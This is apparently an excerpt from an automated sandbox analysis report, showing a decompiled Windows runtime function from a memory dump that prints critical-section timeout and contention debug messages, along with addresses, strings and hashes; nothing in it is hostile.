                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 04DEFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E04DEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04DE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04DE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x04defdda
                                                      0x04defde2
                                                      0x04defde5
                                                      0x04defdec
                                                      0x04defdfa
                                                      0x04defdff
                                                      0x04defe0a
                                                      0x04defe0f
                                                      0x04defe17
                                                      0x04defe1e
                                                      0x04defe19
                                                      0x04defe19
                                                      0x04defe19
                                                      0x04defe20
                                                      0x04defe21
                                                      0x04defe22
                                                      0x04defe25
                                                      0x04defe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DEFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DEFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DEFE01
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 2ab420e75eb49af43b5a9364ea0b2432225b9a9b9e181eef1ac47b61a73d290e
                                                      • Instruction ID: 25832b3b18d2574e630e2dde1835442f6ac87a3a6eeca444d9eaca8045404500
                                                      • Opcode Fuzzy Hash: 2ab420e75eb49af43b5a9364ea0b2432225b9a9b9e181eef1ac47b61a73d290e
                                                      • Instruction Fuzzy Hash: C4F0FC762001017FE6202A86DC01F337B5AEB84B74F140354F614561D1D962FC3096F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%